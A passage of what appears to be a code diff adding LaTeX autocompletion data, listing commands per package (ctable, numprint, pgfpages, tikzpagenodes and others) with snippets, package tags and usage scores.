+ snippet: '\\string', + meta: 'newtxtext-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'newtxtext-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'newtxtext-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'newtxtext-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'newtxtext-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'newtxtext-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'newtxtext-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'newtxtext-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'newtxtext-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'newtxtext-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'newtxtext-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'newtxtext-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'newtxtext-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'newtxtext-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'newtxtext-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'newtxtext-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'newtxtext-cmd', + score: 0.008565354665444157, + }, + ], + silence: [ + { + caption: '\\WarningsOff[]', + snippet: '\\WarningsOff[$1]', + meta: 'silence-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\WarningFilter{}{}', + snippet: '\\WarningFilter{$1}{$2}', + meta: 'silence-cmd', + score: 0.0010293824370507024, + }, + ], + numprint: [ + { + caption: '\\textcelsius', + snippet: '\\textcelsius', + meta: 'numprint-cmd', + score: 0.00012244782670334462, + }, + { + caption: '\\pm', + snippet: '\\pm', + meta: 'numprint-cmd', + score: 0.15663535405975132, + }, + { + caption: '\\npdecimalsign{}', + snippet: '\\npdecimalsign{$1}', + meta: 'numprint-cmd', + score: 8.401009062000455e-6, + }, + { + caption: '\\npthousandsep{}', + snippet: '\\npthousandsep{$1}', + meta: 'numprint-cmd', + score: 8.401009062000455e-6, + }, + { + caption: '\\np{}', + snippet: '\\np{$1}', + meta: 'numprint-cmd', + score: 0.0001782233963311367, + }, + { + caption: '\\np', + snippet: '\\np', + meta: 'numprint-cmd', + score: 0.0001782233963311367, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'numprint-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'numprint-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'numprint-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: 
'\\multicolumn{$1}{$2}{$3}', + meta: 'numprint-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'numprint-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'numprint-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'numprint-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'numprint-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'numprint-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'numprint-cmd', + score: 0.018615449342361392, + }, + ], + srcltx: [ + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'srcltx-cmd', + score: 0.2659628337907604, + }, + { + caption: '\\input{}', + snippet: '\\input{$1}', + meta: 'srcltx-cmd', + score: 0.4966021927742672, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'srcltx-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'srcltx-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'srcltx-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'srcltx-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'srcltx-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'srcltx-cmd', + score: 0.0018957469739775527, + }, + ], + ctable: [ + { + caption: '\\tmark[]', + snippet: '\\tmark[$1]', + meta: 'ctable-cmd', + score: 0.004423748442334348, + }, + { + caption: '\\ctable[]{}{}{}', + snippet: '\\ctable[$1]{$2}{$3}{$4}', + meta: 'ctable-cmd', + score: 0.0007377841391165772, + }, + { + caption: '\\let', + snippet: '\\let', + meta: 'ctable-cmd', + score: 0.03789745970461662, + }, + { + caption: '\\write', + snippet: '\\write', + meta: 'ctable-cmd', + score: 0.0008038857295393196, + }, + { + caption: '\\tabularxcolumn[]{}', + snippet: '\\tabularxcolumn[$1]{$2}', + meta: 'ctable-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularxcolumn', + snippet: '\\tabularxcolumn', + meta: 'ctable-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularx{}{}', + snippet: '\\tabularx{$1}{$2}', + meta: 'ctable-cmd', + score: 0.0005861357565780464, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ctable-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'ctable-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'ctable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'ctable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'ctable-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'ctable-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'ctable-cmd', + score: 0.0005981923692899367, + }, + { + caption: 
'\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'ctable-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'ctable-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'ctable-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ctable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'ctable-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'ctable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'ctable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'ctable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'ctable-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'ctable-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'ctable-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'ctable-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'ctable-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'ctable-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\specialrule{}{}{}', + snippet: '\\specialrule{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.004974385202605165, + }, + { + caption: '\\cmidrule', + snippet: '\\cmidrule', + meta: 'ctable-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\cmidrule{}', + snippet: '\\cmidrule{$1}', + meta: 'ctable-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\bottomrule', + snippet: '\\bottomrule', + meta: 'ctable-cmd', + score: 0.04533364657852219, + }, + { + caption: '\\midrule', + snippet: '\\midrule', + meta: 'ctable-cmd', + score: 0.07098077735912875, + }, + { + caption: '\\addlinespace', + snippet: '\\addlinespace', + meta: 'ctable-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\addlinespace[]', + snippet: '\\addlinespace[$1]', + meta: 'ctable-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\toprule', + snippet: '\\toprule', + meta: 'ctable-cmd', + score: 0.059857788139528495, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'ctable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'ctable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'ctable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ctable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'ctable-cmd', + score: 
0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'ctable-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ctable-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'ctable-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ctable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'ctable-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'ctable-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'ctable-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'ctable-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'ctable-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'ctable-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'ctable-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'ctable-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'ctable-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'ctable-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'ctable-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'ctable-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'ctable-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'ctable-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'ctable-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'ctable-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'ctable-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'ctable-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'ctable-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'ctable-cmd', + 
score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ctable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'ctable-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'ctable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'ctable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'ctable-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'ctable-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'ctable-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'ctable-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'ctable-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'ctable-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ctable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'ctable-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'ctable-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'ctable-cmd', + score: 0.2864294797053033, + }, + ], + bbding: [ + { + caption: '\\HandRight', + snippet: '\\HandRight', + meta: 'bbding-cmd', + score: 9.986169155719329e-5, + }, + { + caption: '\\XSolidBrush', + snippet: '\\XSolidBrush', + meta: 'bbding-cmd', + score: 0.0003502234425563509, + }, + { + caption: '\\Checkmark', + snippet: '\\Checkmark', + meta: 'bbding-cmd', + score: 0.0010506703276690528, + }, + ], + endfloat: [ + { + caption: '\\DeclareDelayedFloatFlavor{}{}', + snippet: '\\DeclareDelayedFloatFlavor{$1}{$2}', + meta: 'endfloat-cmd', + score: 0.00012872796177294446, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'endfloat-cmd', + score: 0.00037306820619479756, + }, + ], + centernot: [ + { + caption: '\\centernot', + snippet: '\\centernot', + meta: 'centernot-cmd', + score: 0.0002513707969474898, + }, + ], + tikzpagenodes: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpagenodes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpagenodes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikzpagenodes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikzpagenodes-cmd', + score: 
0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikzpagenodes-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikzpagenodes-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikzpagenodes-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikzpagenodes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpagenodes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikzpagenodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikzpagenodes-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikzpagenodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikzpagenodes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\checkoddpage', + snippet: '\\checkoddpage', + meta: 'tikzpagenodes-cmd', + score: 0.00028672585452906425, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikzpagenodes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikzpagenodes-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikzpagenodes-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', 
+ meta: 'tikzpagenodes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpagenodes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikzpagenodes-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.2864294797053033, + }, + ], + xargs: [ + { + caption: '\\newcommandx{}[][]{}', + snippet: '\\newcommandx{$1}[$2][$3]{$4}', + meta: 'xargs-cmd', + score: 0.0001110821063389004, + }, + ], + morefloats: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'morefloats-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'morefloats-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'morefloats-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'morefloats-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'morefloats-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'morefloats-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'morefloats-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'morefloats-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'morefloats-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'morefloats-cmd', + score: 0.021170869458413965, + }, + ], + background: [ + { + caption: '\\BgThispage', + snippet: '\\BgThispage', + meta: 'background-cmd', + score: 0.0003956357273698423, + }, + { + caption: '\\backgroundsetup{}', + snippet: '\\backgroundsetup{$1}', + meta: 'background-cmd', + score: 0.0004910777123492879, + }, + ], + bibunits: [ + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'bibunits-cmd', + score: 0.2659628337907604, + }, + ], + moresize: [ + { + caption: '\\Huge', + snippet: '\\Huge', + meta: 'moresize-cmd', + score: 0.04725806985998919, + }, + ], + pgfpages: [ + { + caption: '\\pgfpagesphysicalpageoptions{}', + snippet: '\\pgfpagesphysicalpageoptions{$1}', + meta: 'pgfpages-cmd', + score: 0.00045967325420052095, + }, + { + caption: '\\pgfpageslogicalpageoptions{}{}', + snippet: '\\pgfpageslogicalpageoptions{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.00045967325420052095, + }, + { + caption: '\\pgfpageoptionborder{}', + snippet: '\\pgfpageoptionborder{$1}', + meta: 'pgfpages-cmd', + score: 0.0009193465084010419, + }, + { + caption: '\\pgfpageoptionborder', + snippet: '\\pgfpageoptionborder', + meta: 'pgfpages-cmd', + score: 0.0009193465084010419, + }, + { + caption: '\\pgfpagesdeclarelayout{}{}{}', + snippet: '\\pgfpagesdeclarelayout{$1}{$2}{$3}', + 
meta: 'pgfpages-cmd', + score: 0.00045967325420052095, + }, + { + caption: '\\pgfpagesuselayout{}', + snippet: '\\pgfpagesuselayout{$1}', + meta: 'pgfpages-cmd', + score: 0.0006090132461062934, + }, + { + caption: '\\pgfpagesuselayout{}[]', + snippet: '\\pgfpagesuselayout{$1}[$2]', + meta: 'pgfpages-cmd', + score: 0.0006090132461062934, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'pgfpages-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'pgfpages-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'pgfpages-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfpages-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfpages-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfpages-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfpages-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfpages-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfpages-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfpages-cmd', + score: 